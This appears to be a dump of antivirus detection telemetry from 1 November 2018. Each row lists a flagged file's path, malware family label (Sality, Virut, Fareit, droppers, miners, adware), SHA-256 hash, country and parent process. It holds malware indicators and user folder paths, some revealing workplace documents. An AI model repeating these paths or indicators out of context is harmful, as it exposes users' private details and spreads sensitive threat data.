  Row(detection=Row(filename='dwh8371.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH8371.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:38:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='juni 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\bopartit juni 2015\\juni 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T14:22:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122123-bd1a5f6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9ea1a170\\AVSCAN-20181101-122106-BA9A3585\\AVSCAN-20181101-122123-BD1A5F6A', filesize=128000, name='TR/Dropper.Gen.#M1.#R1'), hash='142187f2e53e6133e1a3f15c7e58f6758acb4f1864ade910537345f06c33b7e3', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T11:21:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhd6ad.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHD6AD.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:40:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:48:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='peb0313.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\SORE\\PEB0313\\PEB0313.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:31:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160225-029ef9d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160225-029EF9D0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:03:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='230881192938357.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\230881192938357.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cat.exe', filepath='C:\\Users\\X\\Documents\\National Instruments\\Circuit Design Suite 12.0\\codemodl\\USER\\CAT.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='0d0649f7dfc5dd8d852dc8a00b5509ac9c3e9745261a2930cd73d13e80072b53', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:13:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avr-c++.exe', filepath='C:\\Program Files\\arduino-nightly-windows\\arduino-nightly\\hardware\\tools\\avr\\bin\\avr-c++.exe', filesize=832000, name='W32/Sality.AT.#M1.#R1'), hash='0faaff548338c98a2259dd3f448a1d1e7aac1ee6b23920aab264af493931a4a8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Xg+itGwObkS3o7o9.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=37096, timestamp='2018-11-01T00:00:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='security garment.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA ADMINISTRASI HRD\\JADWAL SECURITY GARMENT\\SECURITY GARMENT.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155305-a444c2b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155305-A444C2B1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='indonesia_.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\GAVANS INDONESIA_\\INDONESIA_.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mesin 1.10.14.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PERSIAPAN AUDIT\\LAPORAN P2K3\\P2K3 OKTOBER 2014\\training mesin 1.10.14\\mesin 1.10.14.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155959-ea04c3cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155959-EA04C3CF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:33:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155110-90e96cd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155110-90E96CD4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200623-0ddd0f85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_11b28272\\AVSCAN-20181101-195424-B6338887\\AVSCAN-20181101-200623-0DDD0F85', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:06:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='741184db61a2c19a5e3d6fa7f8f2d834b16388ea87890435c027b85347b7ec6e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\741184DB61A2C19A5E3D6FA7F8F2D834B16388EA87890435C027B85347B7EC6E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='741184db61a2c19a5e3d6fa7f8f2d834b16388ea87890435c027b85347b7ec6e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:52:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='117682-renault-clio-3-gtasa.exe', filepath='C:\\Users\\X\\Desktop\\транспорт для GTA SA\\машины\\117682-renault-clio-3-gtasa.exe', filesize=15684000, name='PUA/GameModding.Gen.#M300.#R6944'), hash='e64700b002769bf2307dae4ac792df097cdc62c658a3416a0981d8fac43b2ab8', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T21:12:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.google.android.apps.maps.exe', filepath='G:\\Android\\data\\com.google.android.apps.maps.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nstC5C0.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='easeus data recovery wizard v12.0.exe', filepath='C:\\Users\\X\\Downloads\\Telegram Desktop\\EaseUS Data Recovery Wizard v12.0.exe', filesize=43328000, name='HEUR/AGEN.1030768.#M1.#R1'), hash='baf717a14ba1720cb126ca474001d7834bf46409bcf8f55e6cf1caf7fc0df936', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T20:38:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b2a122f5716b7c2f954508fc70a17089761b2b7ec73a08c018d3b658ac0ffa87', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\B2A122F5716B7C2F954508FC70A17089761B2B7EC73A08C018D3B658AC0FFA87', filesize=680000, name='TR/Dropper.Gen.#M300.#R246'), hash='b2a122f5716b7c2f954508fc70a17089761b2b7ec73a08c018d3b658ac0ffa87', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:00:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DK', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:29:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201619-b96d669d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3856b854\\AVSCAN-20181101-201603-B6646B1B\\AVSCAN-20181101-201619-B96D669D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:16:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xuaedlbt[1].jpg', filepath='C:\\Documents and Settings\\X\\Configuración local\\Archivos temporales de Internet\\Content.IE5\\MZWLCVY3\\xuaedlbt[1].jpg', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:56:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142940-f9608286', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142940-F9608286', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmpvct2mcsl', filepath='/tmp/tmpvct2mcsl', filesize=192000, name='TR/Downloader.Gen.#M2.#R5133'), hash='d4372429f4e1fd933b72425478d94dc930103a965123cb062c4391b2be4431a3', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T17:44:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:33:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='docs.scr', filepath='C:\\Users\\X\\Documents\\Call Of Duty\\Docs\\Docs.scr', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:31:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105819-9aeb3ba7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105819-9AEB3BA7', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bcadw32.exe', filepath='\\\\?\\C:\\RSoft\\bin\\bcadw32.exe', filesize=2048000, name='HEUR/APC.#M1.#R1'), hash='ade4b1afafa106831aca2250a848b43d0d8e802cd68331b8330146cc503f1bc1', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='media.bat', filepath='C:\\Users\\X\\Recorded TV\\Sample Media\\Media.bat', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141121-ea118abd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0197bd9\\AVSCAN-20181101-140354-BD0DC590\\AVSCAN-20181101-141121-EA118ABD', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:11:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7b7b5901e37e97f942cba6debfb03a8f2300ba10e88ff528378a268b8920ae13', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\7B7B5901E37E97F942CBA6DEBFB03A8F2300BA10E88FF528378A268B8920AE13', filesize=1408000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='7b7b5901e37e97f942cba6debfb03a8f2300ba10e88ff528378a268b8920ae13', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T15:45:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='office volume activation script for z.w.t keygen.rar', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Office 2010 (New) Professional Plus 32bit and 64bit with Volume Edition Activator_timesurfer\\Office Volume Activation Script for Z.W.T Keygen.rar', filesize=284000, name='BDS/Bot.140827.#M1.#R1'), hash='d8cc74b15b4bc6301d90d96b73b55f6ff459468ba2cb096e441539950ff20d8b', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mitmdump.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-10-31_18-39-39\\mitmdump.exe', filesize=5000000, name='HEUR/AGEN.1031272.#M1.#R1'), hash='491d9362db041c189aaf974ea3e1f21b824f12538f90fa6cf927bf0edc26c9af', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:BgyEsPvaDkG571ye.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T14:21:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gag.dll', filepath='ProgramFilesDir/[PluginsDir]/gag.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M2.#R5697'), hash='1637407ac610ce29ed4f4f1c6da3cb8f683c502374d0638389fe3c8e2bdc7c91', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:01:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183739-7061faec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_965a4924\\AVSCAN-20181101-183654-6AE99499\\AVSCAN-20181101-183739-7061FAEC', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:37:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T05:24:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bf16ee6c821d7e07e0ac5eac788d06b3daa92c5d', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\bf16ee6c821d7e07e0ac5eac788d06b3daa92c5d', filesize=2240000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='7b4222bb3be7208499bf9c2fe7ccda6eb9ee32d1182172f230686b494d7d60ae', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:35:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211739-8dfe6e37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8654d906\\AVSCAN-20181101-211723-8B8B532D\\AVSCAN-20181101-211739-8DFE6E37', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:17:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:16:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173901-67aa4455', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29d67868\\AVSCAN-20181101-171852-E21F9068\\AVSCAN-20181101-173901-67AA4455', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:39:10Z'), dt=datetime.date(2018, 11, 1)),
